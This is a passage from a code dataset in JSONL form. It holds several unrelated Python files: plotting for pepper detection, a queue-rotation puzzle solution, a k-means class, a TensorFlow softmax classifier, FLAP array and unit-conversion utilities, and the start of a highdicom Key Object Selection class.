1:\n # coverage[x//10] += 1\n\n # if y%20 == 19:\n # line = \"\"\n # for c in coverage:\n # line += \" .:nhBXWW\"[c//25]\n # coverage = [0]*64\n # print(line)\n\n # finally:\n # pipeline.stop()\n\n\ndef draw_all(one_frame):\n print(\"in drawww\")\n img = np.asarray(Image.open(one_frame.img_path))\n plt.imshow(img)\n img_name = one_frame.img_path.split('/')[-1].split('.')[0]\n pepper_utils.put_title(one_frame)\n\n for peduncle in one_frame.pepper_peduncle_detections.values():\n mask = peduncle.mask\n pepper_fruit_utils.draw_bounding_polygon(peduncle.conf, mask, one_frame.img_shape, color='black', fill=False)\n for pepper_fruit in one_frame.pepper_fruit_detections.values():\n xywh = pepper_fruit.xywh\n x = int(xywh[0])\n y = int(xywh[1])\n w = int(xywh[2])\n h = int(xywh[3])\n pepper_fruit_utils.draw_bounding_box(pepper_fruit.conf, x, y, w, h, color=\"black\", fill=False)\n\n for idx, pepper in one_frame.pepper_detections.items():\n r = np.round(np.random.rand(), 1)\n g = np.round(np.random.rand(), 1)\n b = np.round(np.random.rand(), 1)\n # a = np.round(np.clip(np.random.rand(), 0, 1), 1)\n color = (r, g, b)\n pepper_fruit = pepper.pepper_fruit\n pepper_peduncle = pepper.pepper_peduncle\n xywh = pepper_fruit.xywh\n x = int(xywh[0])\n y = int(xywh[1])\n w = int(xywh[2])\n h = int(xywh[3])\n pepper_fruit_utils.draw_bounding_box(pepper_fruit.conf, x, y, w, h, color=color)\n\n mask = pepper_peduncle.mask\n pepper_fruit_utils.draw_bounding_polygon(pepper_peduncle.conf, mask, one_frame.img_shape, color=color)\n poi_px = pepper.pepper_peduncle.poi_px\n plt.plot(poi_px[1], poi_px[0], 'bo', markersize=2)\n \n # plt.axis('off')\n\n plt.savefig(\n f\"{os.getcwd()}/result/{img_name}_pepper_poi_result.png\",\n bbox_inches='tight', pad_inches=0)\n plt.clf()\n plt.cla()\n print(\"well I don't like this\")","repo_name":"GetAGrip-dot-Ai/pepper_ws","sub_path":"pepper_utils.py","file_name":"pepper_utils.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19517968231","text":"from collections import deque\r\n\r\nn, m = map(int, input().split())\r\nq = input().split(' ')\r\nqueue = deque([i+1 for i in range(n)])\r\n\r\n#for i in range(n):\r\n# queue.append(i+1)\r\n\r\ncount = 0\r\nfor item in q:\r\n while True:\r\n if queue[0] == int(item):\r\n queue.popleft()\r\n break\r\n else:\r\n if queue.index(int(item)) < len(queue)/2:\r\n while queue[0] != int(item):\r\n queue.append(queue.popleft())\r\n count += 1\r\n else:\r\n while queue[0] != int(item):\r\n queue.appendleft(queue.pop())\r\n count += 1\r\n \r\n#print(queue)\r\nprint(count)","repo_name":"alswp006/IT_skill_up","sub_path":"정민/2주차/B1021.py","file_name":"B1021.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7010600635","text":"import pandas as pd\nfrom scipy.io import arff\nfrom sklearn import preprocessing\nimport numpy as np\n\nclass kMean(object):\n\n def __init__(self,dataset,*,K=3):\n self.dataset = dataset\n self.features =self.dataset.columns\n self.K = K\n self.centroids = self.dataset.sample(n=K).values\n\n\n def get_closest_centroid(self,data_point):\n diff = self.centroids - data_point\n square_diff = np.sqrt( diff ** 2 )\n euclidean_dist = np.sum(square_diff, axis=1) / len(data_point)\n index_min_element = np.where(euclidean_dist == np.amin(euclidean_dist))\n return index_min_element[0][0]\n\n def assign_centroid(self):\n data = self.dataset[self.features].values\n self.dataset[\"centroid\"] = list(map(self.get_closest_centroid, data))\n\n\n def calculate_mean_centroid(self):\n new_centroids = np.zeros(self.centroids.shape)\n for centroid_id in range(len(self.centroids)):\n closest_points = self.dataset[\"centroid\"] == centroid_id\n data_points = self.dataset.loc[closest_points.values]\n data_points = data_points[data_points.columns[:-1]]\n new_centroids[centroid_id] = np.mean(data_points.values,axis=0)\n return new_centroids\n\n def termination_condition(self,new_centroids):\n epsilon = 0.001\n abs_diff = np.abs(new_centroids - self.centroids)\n res = np.all(abs_diff < epsilon)\n return res\n\n def Run(self):\n while True:\n self.assign_centroid()\n new_centroids = self.calculate_mean_centroid()\n if self.termination_condition(new_centroids):\n break\n self.centroids = new_centroids\n","repo_name":"masenov9607/kMean","sub_path":"kMean.py","file_name":"kMean.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29396584191","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 17 16:14:10 2018\r\n\r\n@author: YangGao\r\n\"\"\"\r\n\r\ncourses = ['History', 'Math', 'CompSci','Physics','English']\r\n \r\n\r\n\r\nfor index,course in enumerate(courses,start =1):\r\n print(index,course)\r\n\r\ncourses_str = '-'.join(courses)\r\n\r\nnew_list = courses_str.split('-')\r\nprint(new_list)\r\n\r\ncs_courses = {'Math', 'History', 'Physics','CompSci'}\r\nart_courses = {'Math', 'History', 'Art', 'Design'}\r\n\r\nprint(cs_courses.union(art_courses))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"gaoyang97/Python--Basics","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16409670546","text":"# Day_25_03_CarEvaluation.py\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import model_selection, preprocessing\n\n\n# 문제 1\n# cars.data 파일을\n# x_train, x_test, y_train, y_test로 반환하는 함수를 만드세요\n\n# 문제 2\n# 모델을 구축하세요 (앙상블 적용)\n\ndef get_data():\n names = ['buying', 'maint', 'doors',\n 'persons', 'lug_boot', 'safety', 'class']\n\n cars = pd.read_csv('data/car.data',\n header=None,\n names=names)\n print(cars)\n\n enc = preprocessing.LabelEncoder()\n # enc.fit_transform(cars.values) # error\n\n buying = enc.fit_transform(cars.buying)\n maint = enc.fit_transform(cars.maint)\n doors = enc.fit_transform(cars.doors)\n persons = enc.fit_transform(cars.persons)\n lug_boot = enc.fit_transform(cars.lug_boot)\n safety = enc.fit_transform(cars.safety)\n classes = enc.fit_transform(cars['class'])\n\n print(buying.shape, buying.dtype) # (1728,) int32\n\n data = [buying, maint, doors, persons,\n lug_boot, safety, classes]\n data = np.transpose(data)\n print(data.shape, data.dtype) # (1728, 7) int32\n\n x = data[:, :-1]\n y = data[:, -1] # 반드시 1차원이어야 함\n\n return model_selection.train_test_split(x, y, train_size=0.7)\n\n\ndef show_accuracy_sparse(preds, labels):\n preds_arg = np.argmax(preds, axis=1)\n # y_arg = np.argmax(labels, axis=1)\n\n equals = (preds_arg == labels)\n print('acc :', np.mean(equals))\n\n\ndef model_car_evaluation_sparse():\n x_train, x_test, y_train, y_test = get_data()\n\n n_features = x_train.shape[1]\n n_classes = np.max(y_train) + 1\n w = tf.Variable(tf.random_uniform([n_features, n_classes]))\n b = tf.Variable(tf.random_uniform([n_classes]))\n\n ph_x = tf.placeholder(tf.float32)\n\n z = tf.matmul(ph_x, w) + b\n hx = tf.nn.softmax(z)\n\n loss_i = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_train, logits=z)\n loss = tf.reduce_mean(loss_i)\n\n optimizer = tf.train.GradientDescentOptimizer(0.1)\n train = optimizer.minimize(loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n for i in range(1000):\n sess.run(train, {ph_x: x_train})\n print(i, sess.run(loss, {ph_x: x_train}))\n\n # ---------------------------- #\n\n preds_test = sess.run(hx, {ph_x: x_test})\n show_accuracy_sparse(preds_test, y_test)\n\n sess.close()\n\n\nmodel_car_evaluation_sparse()\n","repo_name":"yunhui21/CB_Ai_NLP","sub_path":"WeedDay/Day_25_03_CarEvaluation.py","file_name":"Day_25_03_CarEvaluation.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73721217360","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 23 13:18:25 2019\n\nTools for the FLAP module\n\n@author: Sandor Zoletnik (zoletnik.sandor@ek-cer.hu)\nCentre for Energy Research\n\n\"\"\"\nimport copy\nimport numpy as np\nimport fnmatch\nfrom flap import VERBOSE\n#from decimal import Decimal #UNUSED\n\ndef del_list_elements(input_list, indices):\n \"\"\" delete elements from a list\n \"\"\"\n l = copy.deepcopy(input_list)\n for i in sorted(indices, reverse=True):\n del l[i]\n return l\n\n\ndef unify_list(list1, list2):\n \"\"\" Returns list with elements present in any of the two lists.\n Output list is sorted.\n \"\"\"\n unified_list = copy.deepcopy(list1)\n for d in list2:\n try:\n unified_list.index(d)\n except ValueError:\n unified_list.append(d)\n return sorted(unified_list)\n\ndef select_signals(signal_list, signal_spec):\n \"\"\"\n Selects signals from a signal list following signal specifications.\n\n signal_list: List of strings of possible signal names\n\n signal_spec: List of strings with signal specifications including wildcards\n Normal Unix file name wildcards are accepted and extended with\n [<num>-<num>] type expressions so as e.g. a channel range can be selected.\n\n Returs select_list, select_index\n select_list: List of strings with selected signal names\n select_index: List of indices to signal list of the selected signals\n\n Raises ValueError if there is no match for one specification\n \"\"\"\n\n if (type(signal_spec) is not list):\n _signal_spec = [signal_spec]\n else:\n _signal_spec = signal_spec\n\n if ((len(_signal_spec) == 0) or (signal_list == [])):\n raise ValueError(\"No signal list or signal specification.\")\n\n select_list = []\n select_index = []\n for ch in _signal_spec:\n # This will add a list of possible channel names to the _signal_spec while [<num>-<num>} is found\n startpos = 0\n extended = False\n extended_list = []\n while 1:\n # Searching for opening and closing []\n for i1 in range(startpos,len(ch)):\n if (ch[i1] == '['):\n break\n else:\n break\n if (i1 == len(ch)-1):\n break\n for i2 in range(i1+1,len(ch)):\n if (ch[i2] == ']'):\n break\n else:\n break\n # found the opening and closing bracket\n # Trying to interpret the string between the brackets as <int> - <int>\n try:\n nums = ch[i1+1:i2].split('-')\n nums = [int(nums[0]), int(nums[1])]\n # Extracting the strings before and after the []\n except Exception:\n if (i2 >= len(ch)-2):\n break\n startpos = i2+1\n continue\n if (i1 == 0):\n str1 = \"\"\n else:\n str1 = ch[0:i1]\n if (i2 < len(ch)-1):\n str2 = ch[i2+1:len(ch)]\n else:\n str2 = \"\"\n extended = True\n for i in range(nums[0],nums[1]+1):\n # Adding all the possible strings\n extended_list.append(str1+str(i)+str2)\n startpos = i2+1\n continue\n\n ch_match = False\n\n # if extended list is created not checking original name\n if (not extended):\n for i in range(len(signal_list)):\n if (fnmatch.fnmatch(signal_list[i], ch)):\n select_list.append(signal_list[i])\n select_index.append(i)\n ch_match = True\n if (extended):\n for i in range(len(signal_list)):\n for che in extended_list:\n if (fnmatch.fnmatch(signal_list[i], che)):\n select_list.append(signal_list[i])\n select_index.append(i)\n ch_match = True\n break\n if (not ch_match):\n raise ValueError(\"Signal name: \" + ch + \" is not present.\")\n\n return select_list, select_index\n\ndef chlist(chlist=None, chrange=None, prefix='', postfix=''):\n \"\"\"\n Creates a channel (signal) list name from a prefix, postfix a channel list and a list of channel\n ranges\n \"\"\"\n ch = []\n if (chlist is not None):\n ch.extend(chlist)\n if (chrange is not None):\n n = int(len(chrange) / 2)\n for i in range(n):\n ch.extend(list(range(chrange[i * 2],chrange[i * 2 + 1] + 1)))\n ch_str = []\n for c in ch:\n ch_str.append(prefix + str(c) + postfix)\n return ch_str\n\n\ndef submatrix_index(mx_shape, index):\n \"\"\" Given an arbitrary dimension matrix with shape mx_shape the tuple to\n extract a submatrix is created and returned.\n The elements in each dimension are selected by index.\n\n Input:\n mx_shape: Shape of the matrix\n index: Tuple or list of 1D numpy arrays. The length should be equal to the\n length of mx_shape. Each array contains the indices for the\n corresponding dimension.\n Return value:\n A tuple of index matrices. Each index matrix has the same shape as\n described by index. Each matrix contains the indices for one dimension\n of the matrix. This tuple can be directly used for indexing the matrix.\n \"\"\"\n\n index_arrays = []\n mx_dim = len(mx_shape)\n for i in range(mx_dim):\n # Creating a matrix with 1 element in each direction and the\n # number of elements in index[i] in the i-th dimension\n shape = [1] * mx_dim\n shape[i] = index[i].size\n # Creating this matrix\n ind = np.zeros(tuple(shape),dtype=int)\n # Creating a list of indices with 0 at all places except at i where '...'\n ind_ind = [0] * mx_dim\n ind_ind[i] = ...\n ind[tuple(ind_ind)] = index[i]\n # Expanding this matrix in all other dimensions\n for j in range(mx_dim):\n if (j != i):\n ind = np.repeat(ind,index[j].size,j)\n index_arrays.append(ind)\n\n# for i in range(len(mx_shape)): #THIS IS A SOLUTION FOR LARGE MATRICES, BUT NOT COMMITED\n# index_arrays.append(slice(min(index[i]),max(index[i])+1)) #DUE TO BEING UNTESTED. NEEDS TO BE UNCOMMENTED IF ONE WANTS TO USE IT\n return tuple(index_arrays)\n\n\ndef expand_matrix(mx,new_shape,dim_list):\n \"\"\" Insert new dimensions to a matrix so as it has <new shape> shape.\n The original dimensions are at dim_list dimensions\n\n Input:\n mx: The matrix with arbitrary dimensions.\n new_shape: This will be the new shape\n dim_list: This is a list of dimensions where mx is in the output\n matrix. len(dim_list) == mx.ndim\n \"\"\"\n\n act_dim = 0\n act_list = 0\n if (type(dim_list) is not list):\n _dim_list = dim_list\n else:\n _dim_list = dim_list\n for i in range(len(new_shape)):\n if ((act_list >= len(_dim_list)) or (act_dim < _dim_list[act_list])):\n mx = np.expand_dims(mx,act_dim)\n mx = np.repeat(mx,new_shape[act_dim],act_dim)\n else:\n act_list += 1\n act_dim += 1\n return mx\n \ndef flatten_multidim(mx, dim_list):\n \"\"\" Flatten the dimensions in dim_list to dim_list[0]\n Returns the modified matrix and a mapping from the original to the new dimension list.\n The mapping will be None for the flattened dimension in dim_list even if\n flattening was not done. The dimension numbers in the dimension list assume that\n the flattened dimensions are removed.\n \"\"\"\n if (len(dim_list) <= 1):\n dimension_mapping = [None]*mx.ndim\n count = 0\n for i in range(mx.ndim):\n try:\n dim_list.index(i)\n except ValueError:\n dimension_mapping[i] = count\n count += 1\n return mx, dimension_mapping\n\n out_shape = []\n flat_size = 1\n for d in dim_list:\n flat_size *= mx.shape[d]\n #This is the mapping from the remaining dimensions to the output matrix dimensions\n out_dim_mapping = [None]*mx.ndim\n flat_dim_mapping = [None]*mx.ndim\n out_dim_counter = 0\n flat_dim_counter = 0\n for i in range(mx.ndim):\n try:\n dim_list_i = dim_list.index(i)\n if (dim_list_i == 0):\n out_shape.append(flat_size)\n flat_dim_counter += 1\n except ValueError:\n out_shape.append(mx.shape[i])\n out_dim_mapping[i] = out_dim_counter\n flat_dim_mapping[i] = flat_dim_counter\n out_dim_counter += 1\n flat_dim_counter += 1\n\n # Creating index matrices for each dimension of dimension list and flattening them to\n # create index\n flat_submx_shape = [ mx.shape[x] for x in dim_list]\n ind_flat_list =[]\n for i in range(len(flat_submx_shape)):\n ind = np.arange(flat_submx_shape[i])\n ind_flat_list.append(expand_matrix(ind, flat_submx_shape, [i]).flatten())\n # Creating as many index matrices as the number of dimensions of mx\n mx_list = []\n for i in range(mx.ndim):\n try:\n dim_list_i = dim_list.index(i)\n ind = ind_flat_list[dim_list_i]\n out_dim = dim_list[0]\n except ValueError:\n ind = np.arange(mx.shape[i])\n out_dim = flat_dim_mapping[i]\n mx_list.append(expand_matrix(ind, out_shape, [out_dim]))\n\n return mx[tuple(mx_list)], out_dim_mapping\n\ndef multiply_along_axes(a1_orig, a2_orig, axes,keep_a1_dims=True):\n \"\"\" \n Multiplies two arrays along given axes. \n INPUT:\n a1_orig: Array 1.\n a2_orig: Array 2.\n axes: List of two axis numbers or list of two lists of axis numbers\n keep_1_dims: (bool) \n If True: The output array has dimensions of a1 followed by a2 with the common dims removed\n If False: The output array has the a1 dimensions without common dims then the common dims\n followed by a2 with the common dims removed\n Return values:\n a, axis_source, axis_number\n a: An array with dimension number a1.dim+a2.dim-1. \n axis_source: List of integers telling the source array for each output axis ( 0 or 1)\n axis_number: Axis numbers in the arrays listed in axes_source\n \"\"\"\n if (type(axes[0]) is not list):\n axes[0] = [axes[0]]\n if (type(axes[1]) is not list):\n axes[1] = [axes[1]]\n for i in range(len(axes[0])): \n if (a1_orig.shape[axes[0][i]] != a2_orig.shape[axes[1][i]]):\n raise ValueError(\"Incompatible shapes.\")\n\n a1 = a1_orig\n a2 = a2_orig\n a1_shape = a1.shape\n a1_axes = list(range(a1.ndim))\n a2_shape = a2.shape\n a2_axes = list(range(a2.ndim))\n for i in range(len(axes[0])):\n # Finding the axis\n ind = a1_axes.index(axes[0][i])\n # Move from a1 the processing axis to the end\n a1 = np.moveaxis(a1,ind,-1)\n # Following this change in the axis list\n del a1_axes[ind]\n a1_axes.append(axes[0][i])\n # Move from a2 the processing axis to the front\n ind = a2_axes.index(axes[1][i])\n a2 = np.moveaxis(a2,ind,i)\n del a2_axes[ind]\n a2_axes.insert(i,axes[1][i])\n out_shape = list(a1.shape) + list(a2.shape)[len(axes[0]):]\n for i in range(len(out_shape)-len(a1_shape)):\n a1 = np.expand_dims(a1,-1)\n for i in range(len(out_shape)-len(a2_shape)):\n a2 = np.expand_dims(a2,0) \n r = a1 * a2\n if (keep_a1_dims):\n # Moving the processing axes back where they were in the original array\n # We have to move the axis in increasing destination order\n sort_axes = axes[0]\n sort_axes.sort()\n for i in range(len(sort_axes)):\n ind = a1_axes.index(sort_axes[i])\n r = np.moveaxis(r, ind, sort_axes[i])\n del a1_axes[ind]\n a1_axes.insert(sort_axes[i],sort_axes[i])\n axis_source = [0]*a1_orig.ndim + [1]*(a2_orig.ndim - len(axes[0]))\n axis_number = a1_axes + a2_axes[len(axes[1]):]\n return r, axis_source, axis_number\n\ndef move_axes_to_end(mx_orig,axes):\n \"\"\" Moves the listed axes to the end.\n \"\"\"\n mx = mx_orig\n mx_axes = list(range(mx.ndim))\n for i in range(len(axes)):\n # Finding the axis\n ind = mx_axes.index(axes[i])\n # Move from to the end\n mx = np.moveaxis(mx,ind,-1)\n # Following this change in the axis list\n del mx_axes[ind]\n mx_axes.append(axes[i])\n return mx, mx_axes\n \ndef move_axes_to_start(mx_orig,axes):\n \"\"\" Moves the listed axes to the start axes.\n \"\"\"\n mx = mx_orig\n mx_axes = list(range(mx.ndim))\n for i in range(len(axes)):\n # Finding the axis\n ind = mx_axes.index(axes[i])\n # Move from to the end\n mx = np.moveaxis(mx,ind,0)\n # Following this change in the axis list\n del mx_axes[ind]\n mx_axes.insert(i,axes[i])\n return mx, mx_axes\n \ndef find_str_match(value, options):\n \"\"\"\n Given value string and a list of possibilities in the list of strings option\n find matches assuming value is an abbreviation. Return ValueError if no match \n or multiple match is found.\n If one match is found return the matching string\n \"\"\"\n if (type(value) is not str):\n raise TypeError(\"Invalid value.\")\n matches = []\n for s in options:\n if (value == s[0:min([len(value),len(s)])]):\n if (len(matches) != 0):\n raise ValueError(\"Too short abbreviation: \"+value)\n matches.append(s)\n if (len(matches) == 0):\n raise ValueError(\"No match for \"+value)\n return matches[0]\n\ndef grid_to_box(xdata,ydata):\n \"\"\"\n Given 2D x and y coordinate matrices create box coordinates around the points as\n needed by matplotlib.pcolomesh.\n xdata: X coordinates. \n ydata: Y coordinates. \n In both arrays x direction is along first dimension, y direction along second dimension.\n Returns xbox, ybox.\n \"\"\"\n xdata = np.transpose(xdata.astype(float))\n xbox_shape = list(xdata.shape)\n xbox_shape[0] += 1\n xbox_shape[1] += 1\n xbox = np.empty(tuple(xbox_shape),dtype=xdata.dtype)\n xbox[1:,1:-1] = (xdata[:,:-1] + xdata[:,1:]) / 2 \n xbox[1:-1,1:-1] = (xbox[2:,1:-1] + xbox[1:-1,1:-1]) / 2\n xbox[1:-1,0] = ((xdata[1:,0] + xdata[:-1,0]) / 2 - xbox[1:-1,1]) * 2 + xbox[1:-1,1]\n xbox[1:-1,-1] = ((xdata[1:,-1] + xdata[:-1,-1]) / 2 - xbox[1:-1,-2]) * 2 + xbox[1:-1,-2]\n xbox[0,1:-1] = ((xdata[0,:-1] + xdata[0,1:]) / 2 - xbox[1,1:-1]) * 2 + xbox[1,1:-1]\n xbox[-1,1:-1] = ((xdata[-1,:-1] + xdata[-1,1:]) / 2 - xbox[-2,1:-1]) * 2 + xbox[-2,1:-1]\n xbox[0,0] = xbox[1,1] + (xbox[0,1] - xbox[1,1]) + (xbox[1,0] - xbox[1,1])\n xbox[-1,-1] = xbox[-2,-2] + (xbox[-1,-2] - xbox[-2,-2]) + (xbox[-2,-1] - xbox[-2,-2])\n xbox[0,-1] = xbox[1,-2] + (xbox[0,-2] - xbox[1,-2]) + (xbox[1,-1] - xbox[1,-2]) \n xbox[-1,0] = xbox[-2,1] + (xbox[-1,1] - xbox[-2,1]) + (xbox[-2,0] - xbox[-2,1])\n \n ydata = np.transpose(ydata.astype(float))\n ybox_shape = list(ydata.shape)\n ybox_shape[0] += 1\n ybox_shape[1] += 1\n ybox = np.empty(tuple(ybox_shape),dtype=ydata.dtype)\n ybox[1:,1:-1] = (ydata[:,:-1] + ydata[:,1:]) / 2 \n ybox[1:-1,1:-1] = (ybox[2:,1:-1] + ybox[1:-1,1:-1]) / 2\n ybox[1:-1,0] = ((ydata[1:,0] + ydata[:-1,0]) / 2 - ybox[1:-1,1]) * 2 + ybox[1:-1,1]\n ybox[1:-1,-1] = ((ydata[1:,-1] + ydata[:-1,-1]) / 2 - ybox[1:-1,-2]) * 2 + ybox[1:-1,-2]\n ybox[0,1:-1] = ((ydata[0,:-1] + ydata[0,1:]) / 2 - ybox[1,1:-1]) * 2 + ybox[1,1:-1]\n ybox[-1,1:-1] = ((ydata[-1,:-1] + ydata[-1,1:]) / 2 - ybox[-2,1:-1]) * 2 + ybox[-2,1:-1]\n ybox[0,0] = ybox[1,1] + (ybox[0,1] - ybox[1,1]) + (ybox[1,0] - ybox[1,1])\n ybox[-1,-1] = ybox[-2,-2] + (ybox[-1,-2] - ybox[-2,-2]) + (ybox[-2,-1] - ybox[-2,-2])\n ybox[0,-1] = ybox[1,-2] + (ybox[0,-2] - ybox[1,-2]) + (ybox[1,-1] - ybox[1,-2]) \n ybox[-1,0] = ybox[-2,1] + (ybox[-1,1] - ybox[-2,1]) + (ybox[-2,0] - ybox[-2,1])\n \n return xbox,ybox\n\ndef time_unit_translation(time_unit=None,max_value=None):\n if (str(type(time_unit)) == 'str' or \n str(type(time_unit)) == \"<class 'numpy.str_'>\"):\n _time_unit=time_unit.lower()\n else:\n _time_unit=time_unit\n if ((_time_unit == ' ') or (_time_unit is None)) and (max_value is not None):\n #Raise awareness:\n if VERBOSE:\n print('Time unit: \\''+str(_time_unit)+'\\'')\n print('Time unit translation based on values only works for shots under 1000s.')\n value_translation=[[1,1e3,1e6,1e9,1e12],\n ['s','ms','us','ns','ps']]\n for i in range(len(value_translation[0])-1):\n if (max_value > value_translation[0][i] and max_value < value_translation[0][i+1]):\n _time_unit=value_translation[1][i]\n elif max_value > value_translation[0][4]:\n _time_unit=value_translation[1][4]\n translation={'seconds':1,\n 'second':1,\n 's':1,\n 'milliseconds':1e-3,\n 'millisecond':1e-3,\n 'ms':1e-3,\n 'microseconds':1e-6,\n 'microsecond':1e-6,\n 'us':1e-6,\n 'nanoseconds':1e-9,\n 'nanosecond':1e-9,\n 'ns':1e-9,\n 'picoseconds':1e-12,\n 'picosecond':1e-12,\n 'ps':1e-12\n }\n if (_time_unit in translation.keys()):\n return translation[_time_unit]\n else:\n if type(_time_unit) is not str:\n backwards_translation=[[1,1e-3,1e-6,1e-9,1e-12],\n ['s','ms','us','ns','ps']]\n for i in range(len(backwards_translation[0])):\n if backwards_translation[0][i] == _time_unit:\n return backwards_translation[1][i]\n else:\n print(_time_unit+' was not found in the translation. Returning 1.')\n return 1\n \ndef spatial_unit_translation(spatial_unit=None):\n _spatial_unit=spatial_unit.lower()\n translation={'meters':1,\n 'meter':1,\n 'm':1,\n 'millimeters':1e-3,\n 'millimeter':1e-3,\n 'mm':1e-3,\n 'micrometers':1e-6,\n 'micrometer':1e-6,\n 'um':1e-6,\n 'nanometers':1e-9,\n 'nanometer':1e-9,\n 'nm':1e-9,\n 'picometers':1e-12,\n 'picometer':1e-12,\n 'pm':1e-12,\n }\n if (_spatial_unit in translation.keys()):\n return translation[_spatial_unit]\n else:\n print(_spatial_unit+' was not found in the translation. Returning 1.')\n return 1\n \ndef unit_conversion(original_unit=None,\n new_unit=None\n ):\n \n #The code provides a unit conversion between any unit types for most\n #of the prefixes. \n #There are certain limitations:\n # The unit compatibility is not checked (e.g. mm-->MegaHertz is allowed)\n \n known_conversions_full={'Terra':1e12,\n 'Giga':1e9,\n 'Mega':1e6,\n 'kilo':1e3,\n 'milli':1e-3,\n 'micro':1e-6,\n 'nano':1e-9,\n 'pico':1e-12,\n }\n \n known_conversions_short={'T':1e12,\n 'G':1e9,\n 'M':1e6,\n 'k':1e3,\n 'm':1e-3,\n 'u':1e-6,\n 'n':1e-9,\n 'p':1e-12\n }\n \n original_unit_translation=None\n new_unit_translation=None\n \n #Trying to find the long unit names in the inputs\n \n for keys_full in known_conversions_full:\n if keys_full in original_unit:\n original_unit_translation=known_conversions_full[keys_full]\n if keys_full in new_unit:\n new_unit_translation=known_conversions_full[keys_full]\n \n if original_unit_translation is None:\n if len(original_unit) == 1 or len(original_unit) > 3 : # SI units are longer than 3 if using the full name\n original_unit_translation=1.\n else:\n for keys_short in known_conversions_short:\n if keys_short == original_unit[0]:\n original_unit_translation=known_conversions_short[keys_short]\n \n if new_unit_translation is None: \n if len(new_unit) == 1 or len(new_unit) > 3:\n new_unit_translation=1.\n else:\n for keys_short in known_conversions_short:\n if keys_short == new_unit[0]:\n new_unit_translation=known_conversions_short[keys_short]\n \n if original_unit_translation is None: \n print('Unit translation cannot be done for the original unit. Returning 1.')\n if VERBOSE:\n if len(original_unit) > 3:\n print('Known conversion units are:')\n print(known_conversions_full)\n else:\n print('Known conversion units are:')\n print(known_conversions_short)\n original_unit_translation=1.\n \n if new_unit_translation is None:\n print('Unit translation cannot be done for the new unit. Returning 1.')\n if VERBOSE:\n if len(original_unit) > 3:\n print('Known conversion units are:')\n print(known_conversions_full)\n else:\n print('Known conversion units are:')\n print(known_conversions_short)\n new_unit_translation=1.\n \n return original_unit_translation/new_unit_translation\n \n \n \n \n \n\n#import matplotlib.pyplot as plt\n\n#plt.clf()\n#ydata, xdata = np.meshgrid(np.arange(10),np.arange(20))\n#xdata = xdata.astype(float)\n#ydata = ydata.astype(float)\n#xdata += ydata*0.1\n#ydata += xdata*0.2\n#xbox, ybox = grid_to_box(xdata,ydata)\n#data = (xdata + ydata)\n#plt.pcolormesh(xbox,ybox,np.transpose(data),cmap='Greys')\n#plt.scatter(xdata.flatten(), ydata.flatten())\n\n","repo_name":"fusion-flap/flap","sub_path":"flap/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"72596574482","text":"\"\"\"Content that is specific to Key Object Selection IODs.\"\"\"\nfrom typing import cast, List, Optional, Sequence, Union\n\nfrom pydicom.dataset import Dataset\nfrom pydicom.sr.coding import Code\nfrom pydicom.sr.codedict import codes\n\nfrom highdicom.sr.coding import CodedConcept\nfrom highdicom.sr.enum import RelationshipTypeValues, ValueTypeValues\nfrom highdicom.sr.value_types import (\n ContainerContentItem,\n ContentSequence,\n TextContentItem,\n ImageContentItem,\n CompositeContentItem,\n WaveformContentItem,\n)\nfrom highdicom.sr.templates import (\n DeviceObserverIdentifyingAttributes,\n ObserverContext,\n PersonObserverIdentifyingAttributes,\n)\n\n\nclass KeyObjectSelection(ContentSequence):\n\n \"\"\"Sequence of structured reporting content item describing a selection\n of DICOM objects according to structured reporting template\n :dcm:`TID 2010 Key Object Selection <part16/chapter_A.html#sect_TID_2010>`.\n \"\"\"\n\n def __init__(\n self,\n document_title: Union[Code, CodedConcept],\n referenced_objects: Sequence[Dataset],\n observer_person_context: Optional[ObserverContext] = None,\n observer_device_context: Optional[ObserverContext] = None,\n description: Optional[str] = None\n ):\n \"\"\"\n Parameters\n ----------\n document_title: Union[pydicom.sr.coding.Code, highdicom.srCodedConcept]\n Coded title of the document\n (see :dcm:`CID 7010 <part16/sect_CID_7010.html>`)\n referenced_objects: Sequence[pydicom.dataset.Dataset]\n Metadata of selected objects that should be referenced\n observer_person_context: Union[highdicom.sr.ObserverContext, None], optional\n Observer context describing the person that selected the objects\n observer_device_context: Union[highdicom.sr.ObserverContext, None], optional\n Observer context describing the device that selected the objects\n description: Union[str, None], optional\n Description of the selected objects\n\n \"\"\" # noqa: E501\n super().__init__(is_root=True)\n item = ContainerContentItem(\n name=document_title, # CID 7010\n template_id='2010'\n )\n item.ContentSequence = ContentSequence()\n\n if observer_person_context is not None:\n if not isinstance(observer_person_context, ObserverContext):\n raise TypeError(\n 'Argument \"observer_person_context\" must have type '\n 'ObserverContext.'\n )\n if observer_person_context.observer_type != codes.DCM.Person:\n raise ValueError(\n 'Argument \"observer_person_context\" must have Observer '\n 'Type \"Person\".'\n )\n item.ContentSequence.extend(observer_person_context)\n if observer_device_context is not None:\n if not isinstance(observer_device_context, ObserverContext):\n raise TypeError(\n 'Argument \"observer_device_context\" must have type '\n 'ObserverContext.'\n )\n if observer_device_context.observer_type != codes.DCM.Device:\n raise ValueError(\n 'Argument \"observer_device_context\" must have Observer '\n 'Type \"Device\".'\n )\n item.ContentSequence.extend(observer_device_context)\n\n if description is not None:\n description_item = TextContentItem(\n name=CodedConcept(\n value='113012',\n scheme_designator='DCM',\n meaning='Key Object Description'\n ),\n 